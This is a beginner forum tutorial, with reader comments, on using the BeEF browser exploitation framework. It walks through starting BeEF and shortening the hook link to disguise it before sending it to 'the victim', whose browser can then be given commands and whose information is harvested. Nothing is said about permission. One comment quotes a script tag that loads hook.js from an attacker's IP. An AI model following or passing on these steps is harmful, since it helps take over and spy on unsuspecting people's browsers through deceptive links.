How To: Use beEF (Browser Exploitation Framework)

Use beEF (Browser Exploitation Framework)

How to Use beEF (Browser Exploitation Framework)

I'm still amazed by all the things some people just don't know. Script-kiddies often refer to Metasploit if someone asks them how to hack a computer because they think there's simply no other way. Well here I am today trying to increase your set of tools and -of course- skills.

What is beEF?

beEF is the Browser Exploitation Framework and is a Open-source penetration testing tool that focuses on browser-based vulnerabilities. That means that beEF is extremely useful for Social engineers with "fake" website's. This tool is of course also useful for anyone who "need's" it.

Getting started...

First thing you'll need is Linux. And after that you will need to install the beEF software which is found here. You also might have it already installed. It can be found here:

After that you'r ready to use beEF

Step 1: Starting beEF.

Go ahead and start beEF. It'll show something like this:

The selected link is the link you should use to connect to you'r beEF UI. But it should open a browser session automatically. The username and password are beef.

Step 2: What's Next?

Now we need someone to connect to our link. This can be done using the easy, or the hard method. I'm going to focus on the easy one. You just need to send the link from beef to someone. Don't forget to shorten the URL. You'll need the "Hook-URL."

Then you'll get a screen similar to this:

You can clearly see that a browser is connected and is online!

A Few Final Tips & Info

>If you don't know how to shorten an URL, just use google.

>If you'r not sure that beEF is working correctly, open up you'r browser and enter: http://127.0.0.1:3000/demos/basic.html . this should be the result:

What are we able to do know?

Well, we can send certain commands to the victim. Also we get every info there is available about him/her so that's pretty pro. Right!?

Please comment, give kudos and follow me for more amazing tutorials._

8 Comments

Good Article. But Which link we should send to the Victim ?

As soon as you boot up beEF you get a console windows. There you'll be able to find it.

is there any post showing the hardway ?

Can you please teach the hard way?

I think perhaps it would be writing the hook.js ourselves rather than letting it be generated by BeEF.

<script src="http://<IP>:3000/hook.js"></script>, is the link we to send to the victim..??

Share Your Thoughts

  • Hot
  • Latest